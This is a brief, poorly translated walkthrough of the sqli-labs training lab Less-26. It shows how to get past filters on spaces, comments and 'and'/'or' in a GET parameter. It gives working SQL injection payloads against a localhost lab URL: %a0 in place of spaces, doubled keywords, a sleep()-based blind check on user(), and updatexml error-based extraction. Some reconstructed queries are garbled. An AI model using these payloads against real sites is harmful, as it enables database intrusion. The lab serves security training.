Read the next source
All the annotation forms and backslashes, and,or have been filtered out.
Single quotes without filtering
The space is filtered, too.
Http://localhost/sqli-labs-master/Less-26/?id=1 '
Http://localhost/sqli-labs-master/Less-26/?id=1 "
Look at some of the online methods are using the%A0 replaced the space
Http://localhost/sqli-labs-master/Less-26/?id=1 '%a0oorr%a0 ' 1 ' = ' 1
But a bit of a problem, seems to be unable to identify the character%a0, some people say is the window environment Apache problem
Can be placed first, because this statement can be executed normally
Http://localhost/sqli-labs-master/Less-26/?id=1 ' Oorr ' 1 ' = ' 1
SELECT * from WHERE id='1'or'1'= '1'0,1
With this, you can construct such an injection
The value of the ID parameter does not contain a comment that does not contain a space, but can be performed normally when the first character of user () is ' r ', the delay is 1s
http://localhost/sqli-labs-master/Less-26/?id=1 '%26%26sleep (ASCII (Mid (User (), 1) =114)%26%26 ' 1 ' = '
Select * fromUserswhereId='1'&&SleepASCII(Mid (User(),1,1))= the)&&'1'='1'Limit0,1
Of course, the error message is not masked can also be used Updatexml function direct error to display
http://localhost/sqli-labs-master/Less-26/?id=1 '%26%26updatexml (1,concat (0x7e,user (), 0x7e), 1)%26%26 ' 1 ' = ' 1
"Sqli-labs" Less26 get-error based-all you SPACES and COMMENTS belong to us (GET type error-based removal of whitespace and annotation injection)